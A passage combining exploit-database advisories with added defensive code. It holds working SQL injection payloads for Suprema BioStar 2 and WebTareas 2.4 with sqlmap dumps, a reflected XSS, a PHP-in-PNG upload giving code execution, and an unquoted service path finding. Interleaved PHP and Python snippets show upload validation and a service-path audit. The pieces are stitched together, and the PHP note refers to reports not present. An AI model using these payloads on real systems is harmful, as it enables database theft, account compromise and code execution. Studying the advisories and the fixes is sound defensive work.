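    if ($size === false || $size === 0 || $size > MAX_IMAGE_BYTES) {
        return $fail('size out of range');
    }
    // Early reject on the client extension ("shell.php", "upload.php56").
    // Convenience only: the stored extension is chosen further down.
    $clientExt = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($clientExt, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return $fail('client extension not allowed');
    }
    // Magic-byte detection, independent of the Content-Type the client sent.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!isset(IMAGE_TYPES[$mime])) {
        return $fail("detected type $mime is not an allowed image");
    }
    // Decode with GD. A "GIF89a;" stub followed by text carries the right
    // magic bytes but is not a decodable image and is rejected here. A real
    // image is re-encoded from its pixels, so nothing appended to it survives.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        return $fail('content is not a decodable image');
    }
    $ext      = IMAGE_TYPES[$mime];
    $encoders = ['png' => 'imagepng', 'jpg' => 'imagejpeg', 'gif' => 'imagegif'];
    $dest     = rtrim($destDir, '/\\') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    $written  = $encoders[$ext]($img, $dest);
    imagedestroy($img);
    return $written ? ['ok' => true, 'reason' => 'stored', 'path' => $dest] : $fail('write failed');
}

// Demonstration with constructed inputs in a temporary directory.
$dir = sys_get_temp_dir() . '/upload_demo_' . bin2hex(random_bytes(4));
mkdir($dir);

$real = "$dir/real.tmp";                 // a genuine 1x1 PNG produced with GD
$canvas = imagecreatetruecolor(1, 1);
imagepng($canvas, $real);
imagedestroy($canvas);

$stub = "$dir/stub.tmp";                 // GIF magic bytes followed by plain text
file_put_contents($stub, 'GIF89a; this is not image data');

foreach ([[$real, 'photo.png'], [$stub, 'upload.php56'], [$stub, 'avatar.gif']] as [$path, $name]) {
    $r = storeImageUpload($path, $name, $dir);
    printf("%-13s -> %s (%s)\n", $name, $r['ok'] ? 'stored' : 'rejected', $r['reason']);
}
```

In a real request handler the temp path comes from $_FILES['picture']['tmp_name'] (or whatever the field is called) after an is_uploaded_file() check, and $destDir should be outside the document root or in a directory where the web server does not execute scripts; the reports above work precisely because product_images/ and the media directory are both served and executed by PHP.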
<pre><code># Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection<br /># Date: 26/03/2023<br /># Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)<br /># Vendor Homepage: https://www.supremainc.com/<br /># Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp<br /># Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide<br /># Version: 2.8.16<br /># Tested on: Windows, Linux<br /><br />## Description <br />A boolean-based and time-based SQL injection vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute arbitrary SQL commands through the "values" JSON parameter. <br /><br />## Request PoC #1<br />'''<br />POST /api/users/absence?search_month=1 HTTP/1.1<br />Host: biostar2.server.net<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />content-type: application/json;charset=UTF-8<br />content-language: en<br />bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548<br />Content-Length: 204<br />Origin: https://biostar2.server.net<br />Connection: close<br />Referer: https://biostar2.server.net/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}<br /><br />'''<br /><br />Time-based SQL injection (with 4 set, the response is delayed for 8 seconds).<br /><br />'''<br /><br />## Request PoC #2<br />'''<br />POST /api/users/absence?search_month=1 HTTP/1.1<br />Host: biostar2.server.net<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />content-type: application/json;charset=UTF-8<br />content-language: en<br />bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548<br />Content-Length: 188<br />Origin: https://biostar2.server.net<br />Connection: close<br />Referer: https://biostar2.server.net/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}<br /><br />'''<br /><br />Boolean-based SQL injection (the payload “1 and 3523=03523” means “1 and True”, so we can see information in the response regarding the user with id 1, which is admin)<br /><br />'''<br /><br />## Exploit with SQLmap<br /><br />Save the request from Burp Suite to a file.<br /><br />'''<br />---<br />Parameter: JSON #1* ((custom) POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}<br />---<br />[05:02:49] [INFO] testing MySQL<br />[05:02:49] [INFO] confirming MySQL<br />[05:02:50] [INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL > 5.0.0 (MariaDB fork)<br />[05:02:50] [INFO] fetching database names<br 
/>[05:02:50] [INFO] fetching number of databases<br />[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />[05:02:55] [INFO] retrieved: 2<br />[05:03:12] [INFO] retrieved: biostar2_ac<br />[05:03:56] [INFO] retrieved: information_schema<br />available databases [2]:<br />[*] biostar2_ac<br />[*] information schema<br /><br />'''<br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) <br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example <br />-----------------------------------------------------------------------------------------------------------------------<br />Param: webTareasSID in cookie<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/administration/admin.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout<br />Connection: close<br />Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 302 Found<br />Date: Sat, 15 Oct 2022 
11:38:50 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: ../service_site/home.php?msg=permissiondenied<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/administration/admin.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout<br />Connection: close<br />Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 302 Found<br />Date: Sat, 15 Oct 2022 11:38:39 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: 
../service_site/home.php?msg=permissiondenied<br />Content-Length: 355<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /><br /><b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br /><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />SQLMap:<br />-----------------------------------------------------------------------------------------------------------------------<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: Cookie #1* ((custom) HEADER)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br /> <br /> [11:49:03] [INFO] testing MySQL<br /> [11:49:03] [INFO] confirming MySQL<br /> do you want to URL encode cookie values (implementation specific)? 
[Y/n] Y<br /> [11:49:03] [INFO] the back-end DBMS is MySQL<br /> web application technology: PHP 7.4.30, Apache 2.4.54<br /> back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)<br /> [11:49:03] [INFO] fetching database names<br /> [11:49:04] [INFO] starting 6 threads<br /> [11:49:06] [INFO] retrieved: 'zxcv'<br /> [11:49:06] [INFO] retrieved: 'information_schema'<br /> [11:49:06] [INFO] retrieved: 'performance_schema'<br /> [11:49:06] [INFO] retrieved: 'test'<br /> [11:49:06] [INFO] retrieved: 'phpmyadmin'<br /> [11:49:06] [INFO] retrieved: 'mysql'<br /> available databases [6]:<br /> [*] information_schema<br /> [*] mysql<br /> [*] performance_schema<br /> [*] phpmyadmin<br /> [*] test<br /> [*] zxcv<br /><br /> [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'<br /> [11:49:06] [WARNING] your sqlmap version is outdated<br /><br /> [*] ending @ 11:49:06 /2022-10-15/<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Proof Of Concept <br />-----------------------------------------------------------------------------------------------------------------------<br />Param: searchtype<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br /><br 
/>-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 07:46:31 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br />X-Content-Type-Options: nosniff<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 11147<br />[...]<br /><form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)"><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Other vulnerable URLs and params:<br />-----------------------------------------------------------------------------------------------------------------------<br />/webtareas/administration/print_layout.php [doc_type]<br />/webtareas/general/login.php [logout]<br />/webtareas/general/login.php [session]<br />/webtareas/general/newnotifications.php [msg]<br />/webtareas/general/search.php [searchtype]<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - RCE (Authorized)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example in forum -> members forum -> chat<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: chatPhotos0<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /webtareas/includes/chattab_serv.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: */*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126<br />Content-Length: 6852<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="action"<br /><br />sendPhotos<br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatTo"<br /><br />2<br 
/>-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatType"<br /><br />P<br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"<br />Content-Type: image/png<br /><br />PNG<br />[...]<br /><?php phpinfo();?><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 11:27:41 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 661<br />Connection: close<br />Content-Type: application/json<br /><br />{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />See link: /files\/Messages\/7.php<br />-----------------------------------------------------------------------------------------------------------------------<br />Req:<br 
/>-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/files/Messages/7.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: image/avif,image/webp,*/*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Sec-Fetch-Dest: image<br />Sec-Fetch-Mode: no-cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 11:28:16 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 89945<br />[...]<br /><title>PHP 7.4.30 - phpinfo()</title><br />[...]<br /><h1 class="p">PHP Version 7.4.30</h1><br /></td></tr><br /></table><br /><table><br /><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><br /><tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr><br /><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 <br />[...]<br /><br /><br /></code></pre>
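<p>The upload above is accepted because the handler trusts the client's filename and Content-Type and stores the file as 7.php. The validator below is an added example (not WebTareas code) of the checks that handler lacks: an extension allow-list, a magic-byte check against the claimed image type, and a server-derived on-disk name. The IMAGE_SIGNATURES table and the sample inputs are constructed for this example.</p>

```python
import os

# Allow-list of image types the chat photo upload may accept, keyed by extension,
# with the magic bytes each must start with. Constructed for this example.
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename: str, data: bytes) -> str:
    """Return the extension to store an accepted image under, or raise ValueError.

    Only two things are consulted: the extension against the allow-list and the
    file's own leading bytes. The client-supplied Content-Type (image/png in the
    advisory's request) is never trusted, so relabelling a .php file changes nothing.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in IMAGE_SIGNATURES:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        raise ValueError("content does not match the claimed image type")
    return ext


def stored_name(filename: str, data: bytes, message_id: int) -> str:
    """Build the on-disk name from the message id and the validated type.

    The advisory's handler already named the file after the message id (7) but
    kept the user's .php extension. Deriving the extension here is what keeps
    the interpreter from ever running an upload; disabling PHP execution in the
    upload directory (web server config) is the second, independent layer.
    """
    return f"{message_id}.{validate_upload(filename, data)}"


def is_accepted(filename: str, data: bytes) -> bool:
    """True only when the upload passes both checks."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


# Constructed inputs: the shape of the advisory's payload, and a genuine PNG header.
PHP_UPLOAD = ("snupi.php", b"PNG\n<?php phpinfo();?>\n")
REAL_PNG = ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
```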
<pre><code># Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path<br /># Discovery by: Ismael Nava<br /># Discovery Date: 10-13-2022<br /># Vendor Homepage: https://pjo2.github.io/tftpd64/<br /># Software Link: https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe<br /># Tested Version: 4.60<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 Home 64 bits<br /><br /># Steps to discover the Unquoted Service Path:<br /><br />C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """<br /><br />Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto<br /><br />C:\>sc qc Tftpd32_svc<br /><br />NOMBRE_SERVICIO: Tftpd32_svc<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Tftpd32 service edition<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /><br /></code></pre>
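<p>The wmic/findstr chain above selects services whose image path contains a space and is not wrapped in quotes. The audit below is an added example (not the advisory's or vendor's code) that applies the same test to a constructed list of services in the shape of that output, flags every service regardless of start mode, and proposes the quoted binPath that fixes each finding. SAMPLE_SERVICES and all service names other than Tftpd32_svc are constructed.</p>

```python
import re

# Constructed sample in the shape of the advisory's wmic output:
# (service name, pathname, start mode). The first entry is the advisory's finding.
SAMPLE_SERVICES = [
    ("Tftpd32_svc", r"C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good_svc.exe" -run', "Auto"),
    ("PlainSvc", r"C:\Tools\plain_svc.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Manual Vendor\manual.exe --flag", "Manual"),
]

_IMAGE_AND_ARGS = re.compile(r"(.*?\.exe)(.*)", re.IGNORECASE)


def split_image(pathname: str):
    """Split a binary path into (image path, arguments) at the first .exe."""
    m = _IMAGE_AND_ARGS.match(pathname.strip())
    if not m:
        return pathname.strip(), ""
    return m.group(1), m.group(2)


def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the image path is unquoted and contains a space, so the service
    manager has to guess where the executable name ends. This is the condition
    the advisory's findstr chain selects for."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    image, _ = split_image(p)
    return " " in image


def quoted_binpath(pathname: str) -> str:
    """Return the binPath= value that fixes the finding: image in quotes,
    arguments left outside. Apply with: sc config <name> binPath= "<value>"
    (escape the inner quotes as backslash-quote on the command line)."""
    image, args = split_image(pathname)
    return f'"{image}"{args}'


def audit(services):
    """Flag every service with an unquoted, space-containing image path,
    whatever its start mode, and propose the corrected binPath."""
    return [
        (name, mode, quoted_binpath(path))
        for name, path, mode in services
        if is_unquoted_with_spaces(path)
    ]
```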